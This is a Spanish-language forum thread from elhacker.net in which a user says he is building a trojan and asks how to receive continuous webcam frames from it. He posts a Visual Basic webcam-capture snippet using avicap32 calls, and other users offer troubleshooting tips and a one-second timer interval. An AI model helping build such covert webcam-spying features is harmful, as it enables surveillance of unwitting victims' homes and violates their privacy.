Foro de elhacker.net

Programación => Programación Visual Basic => Mensaje iniciado por: xivan25 en 11 Octubre 2011, 23:00 pm



Título: Como recibo Imagenes de Webcam en mi Troyano????
Publicado por: xivan25 en 11 Octubre 2011, 23:00 pm
como actualizar las imagenes que recibo de la webcam,las recibo en un Picturebox,en mi cliente,pero solo recibo 1 imagen,me faltaria recibir las que bienen a continuacion...se que se debe hacer desde un Timer,e intentado poner Picture1.Refresh en el Timer,pero no me las refresca,sigo recibiendo solo 1 imagen :(


Título: Re: Como recibo Imagenes de Webcam en mi Troyano????
Publicado por: DJ_MAQUINA en 12 Octubre 2011, 04:02 am
Hola: Cada vez que recibes una imagen debes dibujarla en el picture. Si no se dibuja es porque simplemente no llegó, revisa si está enviando correctamente.

Seria bueno pusieras el codigo para ayudarte

Saludos


Título: Re: Como recibo Imagenes de Webcam en mi Troyano????
Publicado por: xivan25 en 12 Octubre 2011, 19:38 pm
Hola,tomo este codigo como ejemplo para introducir en mi troyano:

Código:
Private Declare Function SendMessage Lib "USER32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function capCreateCaptureWindow Lib "avicap32.dll" Alias "capCreateCaptureWindowA" (ByVal lpszWindowName As String, ByVal dwStyle As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hwndParent As Long, ByVal nID As Long) As Long
Private mCapHwnd As Long

Private Sub Form_Load()
STARTCAM
End Sub

Private Sub Timer1_Timer()
SendMessage mCapHwnd, 1084, 0, 0
SendMessage mCapHwnd, 1054, 0, 0
Picture1.Picture = Clipboard.GetData
End Sub
Sub STARTCAM()
mCapHwnd = capCreateCaptureWindow("WebcamCapture", 0, 0, 0, 640, 480, Me.hwnd, 0)
'DoEvents
SendMessage mCapHwnd, 1034, 0, 0
End Sub


El Timer lo pongo a intervalo = 1 e intentado ponerlo en el cliente pero me da error,estoy pensando como ponerlo...pero no se como...


Título: Re: Como recibo Imagenes de Webcam en mi Troyano????
Publicado por: newbie007 en 23 Octubre 2011, 03:00 am
el intervalo ponlo a 1000 para q te mande una imagen cada segundo